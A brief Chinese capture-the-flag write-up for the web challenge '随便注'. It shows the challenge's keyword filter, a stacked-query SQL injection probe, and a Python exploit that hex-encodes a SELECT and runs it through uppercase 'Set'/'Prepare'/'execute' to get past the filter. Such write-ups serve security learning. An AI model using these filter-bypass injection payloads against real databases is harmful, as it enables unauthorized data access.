[Web] 随便注 - LanceaKing xp0int Posted on May 27 2019 过滤了select `return preg_match("/select|update|delete|drop|insert|where|\./i", $inject);` 有堆叠查询 `/?inject=1';show databases;show tables;%23`  过滤了set和prepare,但只要大写就能绕过。 `strstr($inject, "set") && strstr($inject, "prepare")` exp.py: ```python #coding=utf-8 import requests #1919810931114514 part_url='http://49.4.66.242:31368/?inject=' payload="select flag from `1919810931114514`;" payload=payload.encode('hex') payload='''1';Set @x=0x'''+str(payload)+''';Prepare a from @x;execute a;%23''' print payload full_url=part_url+payload r=requests.get(url=full_url) print r.content ```  打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Web] 高明的黑客 - LanceaKing [Pwn] trywrite -cpt.shao
没有帐号? 立即注册